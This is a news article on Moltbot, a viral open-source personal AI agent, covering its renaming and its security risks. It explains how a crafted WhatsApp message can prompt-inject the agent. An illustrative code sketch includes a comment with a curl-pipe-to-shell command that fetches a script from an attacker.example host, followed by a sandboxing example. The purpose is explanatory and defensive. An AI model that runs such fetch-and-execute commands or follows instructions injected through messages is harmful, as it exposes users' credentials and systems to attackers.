The latest wave of AI excitement has brought us an unexpected mascot: the lobster. Clawdbot, a personal AI assistant that went viral within weeks of its launch, plans to keep its crustacean theme despite having to change its name to Moltbot following a legal challenge from Anthropic. But before you jump on the bandwagon, there are things you should know.
According to its tagline, Moltbot (formerly Clawdbot) is an “AI that actually does things,” like managing your calendar, sending messages through your favorite apps, and checking in for flights. What began as a rough personal project one developer built for himself has attracted thousands of users willing to work through the technical setup it requires.
That developer is Peter Steinberger, an Austrian developer and founder known online as @steipete who blogs actively about his work. After leaving his previous company, PSPDFKit, Steinberger felt empty and barely touched a computer for three years, he explained on his blog. Eventually he found his spark again, and that led to Moltbot.
Although Moltbot is now much more than a one-person project, the publicly available version is still an outgrowth of Clawd (now called Molty), the personal assistant Steinberger built to help “manage your digital life” and “explore what human-AI collaboration looks like.”
For Steinberger, this meant diving deeper into the AI momentum that had rekindled his builder spark. A self-confessed “claudeholic,” he originally named the project after Anthropic’s flagship AI product, Claude. He revealed on X that Anthropic made him change the brand for trademark reasons; TechCrunch has reached out to Anthropic for comment. The project’s “lobster spirit,” however, remains the same.
For early adopters, Moltbot is a harbinger of how helpful AI assistants can be. People who were already excited about the prospect of using AI to quickly generate websites and apps are now even more eager to have their personal AI assistants perform their tasks for them. And just like Steinberger, they’re keen to tinker with it.
This helps explain how Moltbot quickly gathered more than 44,200 stars on GitHub. It has drawn so much attention that it has even moved the market: Cloudflare stock rose 14% in pre-market trading on Tuesday as social media buzz about the AI agent reignited investor enthusiasm for the company’s infrastructure, which many developers pair with Moltbot instances running locally on their own devices.
Still, Moltbot is a long way from breaking out of early adopter territory, and maybe that’s for the best. Installing it requires a degree of technical savvy, which includes understanding the security risks inherent to it.
On the one hand, Moltbot is built with safety in mind: it is open source, so anyone can inspect its code for vulnerabilities, and it runs on your own computer or server rather than in the cloud. On the other hand, its core premise is inherently dangerous. As entrepreneur and investor Rahul Sood pointed out on X, “‘actually doing something’ means ‘being able to run arbitrary commands on a computer.’”
What keeps Sood up at night is “content-driven prompt injection”: a malicious actor could send you a WhatsApp message crafted so that, once Moltbot reads it, the assistant performs unintended actions on your computer without your knowledge or intervention.
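To make the failure mode concrete, here is a minimal, hypothetical sketch of the pattern Sood is describing; it is not Moltbot’s actual code, and the function names are placeholders. The structural flaw is that untrusted message content is pasted into the same prompt that carries the agent’s instructions, and the agent then executes whatever command the model proposes.

```python
# Hypothetical sketch, not Moltbot's code: a naive "assistant that does things".
import subprocess

SYSTEM_PROMPT = (
    "You are a personal assistant. You may run shell commands to help the user."
)

def call_model(prompt: str) -> str:
    """Placeholder for an LLM call. The model decides what to do next based on
    the prompt text -- including anything an attacker managed to put there."""
    raise NotImplementedError

def handle_incoming_message(message_text: str) -> None:
    # Untrusted content and trusted instructions share one prompt, so the model
    # cannot reliably tell "data to summarize" apart from "orders to follow".
    prompt = (
        f"{SYSTEM_PROMPT}\n\n"
        f"New WhatsApp message:\n{message_text}\n\n"
        "What should I do next?"
    )
    action = call_model(prompt)
    if action.startswith("RUN:"):
        # If a crafted message tricks the model into emitting something like
        # "RUN: curl https://attacker.example/steal.sh | sh", the agent runs it
        # with the user's full privileges.
        subprocess.run(action.removeprefix("RUN:"), shell=True, check=False)
```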
This risk can be partially mitigated with careful setup. Moltbot supports a variety of AI models, so users can factor a model’s resistance to this kind of attack into their choice. The only way to eliminate the risk entirely, however, is to run Moltbot in an isolated silo.
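What a “silo” means in practice varies, but the general idea can be sketched roughly as follows. This is a hypothetical illustration, not part of Moltbot: any command the agent wants to run is handed to a disposable container with no network access and no view of the host’s files or credentials. It assumes Docker is installed, and the image name is only an example.

```python
# Hypothetical sketch of the "silo" approach: run model-proposed commands in a
# throwaway container instead of on your own machine.
import subprocess

def run_in_silo(command: str) -> str:
    """Execute an agent-proposed shell command inside a disposable container."""
    result = subprocess.run(
        [
            "docker", "run",
            "--rm",               # discard the container afterwards
            "--network", "none",  # no outbound network, so nothing to exfiltrate to
            "--read-only",        # no persistent writes inside the image
            "python:3.12-slim",   # example image; any minimal image works
            "sh", "-c", command,
        ],
        capture_output=True,
        text=True,
        timeout=60,
    )
    return result.stdout

if __name__ == "__main__":
    # Even a hostile command only sees an empty container, not your SSH keys,
    # API credentials, or password manager.
    print(run_in_silo("whoami && ls /root"))
```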
While this may be obvious to experienced developers used to tinkering with weeks-old projects, some of them have been vocal about warning the users swept up in the hype: if you approach Moltbot as casually as you would ChatGPT, things can get ugly quickly.
Steinberger himself provided a reminder that malicious actors are watching when the project’s renaming briefly went sideways. He accused “cryptocurrency scammers” of grabbing his old GitHub username and launching a fake cryptocurrency project in his name, warning followers not to trust the coin because whoever owned it was a scammer. He later posted that the GitHub issue had been resolved, but cautioned that the project’s legitimate X account was @moltbot and “not one of those 20 scams.”
This doesn’t mean you should avoid Moltbot at this stage if you want to test it. But if you’ve never heard of a VPS (a virtual private server, a remote computer you rent to run software), you might want to wait your turn. A VPS is where you would ideally run Moltbot, “not a laptop with SSH keys, API credentials, or a password manager,” as Sood warned.
For now, running Moltbot securely means running it on a separate computer with single-use accounts, which largely defeats the purpose of having a useful AI assistant. And resolving that security-versus-utility trade-off may require solutions beyond Steinberger’s control.
Still, by building tools to solve his own problems, Steinberger showed the developer community what AI agents can actually accomplish, and how autonomous AI could eventually become truly useful rather than just impressive.
